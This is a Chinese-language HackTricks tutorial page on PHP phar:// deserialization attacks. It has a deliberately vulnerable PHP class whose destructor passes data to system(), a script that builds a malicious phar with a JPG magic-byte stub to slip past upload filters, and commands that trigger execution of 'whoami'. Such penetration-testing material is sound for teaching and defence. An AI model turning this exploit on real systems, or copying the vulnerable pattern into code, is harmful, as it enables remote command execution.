hacktricks/pentesting-web/file-inclusion/phar-deserialization.md

4.8 KiB
Raw Blame History

phar:// 反序列化

从零到英雄学习 AWS 黑客技术,通过 htARTE (HackTricks AWS 红队专家)!

支持 HackTricks 的其他方式:

如果您对 黑客职业 感兴趣,并且想要黑掉不可黑的 - 我们正在招聘! (需要流利的波兰语书写和口语).

{% embed url="https://www.stmcyber.com/careers" %}

Phar 文件PHP 归档)包含以序列化格式的元数据,因此,当解析时,这些 元数据 会被 反序列化,您可以尝试利用 PHP 代码中的 反序列化 漏洞。

关于这个特性最好的一点是,即使使用不执行 PHP 代码的 PHP 函数,如 file_get_contents(), fopen(), file() 或 file_exists(), md5_file(), filemtime() 或 filesize(),这种反序列化也会发生。

因此,想象一下这样的情况:您可以让 PHP 网页使用 phar:// 协议获取任意文件的大小,并在代码中找到一个类似于以下的

{% code title="vunl.php" %}

<?php
class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}

function __destruct() {
system($this->data);
}
}

filesize("phar://test.phar"); #The attacker can control this path
{% endcode %}

您可以创建一个**phar**文件,当加载时将**滥用这个类来执行任意命令**,类似于:

{% code title="create_phar.php" %}
<?php

class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}

function __destruct() {
system($this->data);
}
}

// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");

// add object of any class as meta data
$object = new AnyClass('whoami');
$phar->setMetadata($object);
$phar->stopBuffering();

{% endcode %}

注意,JPG的魔数\xff\xd8\xff被添加到phar文件的开头绕过可能的文件上传限制
使用以下命令编译test.phar文件:

php --define phar.readonly=0 create_phar.php

执行 whoami 命令来滥用漏洞代码:

php vuln.php

参考资料

{% embed url="https://blog.ripstech.com/2018/new-php-exploitation-technique/" %}

如果您对黑客职业感兴趣,并且想要攻破不可攻破的系统 - 我们正在招聘!需要流利的波兰语书写和口语)。

{% embed url="https://www.stmcyber.com/careers" %}

通过 htARTE (HackTricks AWS Red Team Expert)从零开始学习AWS黑客技术

其他支持HackTricks的方式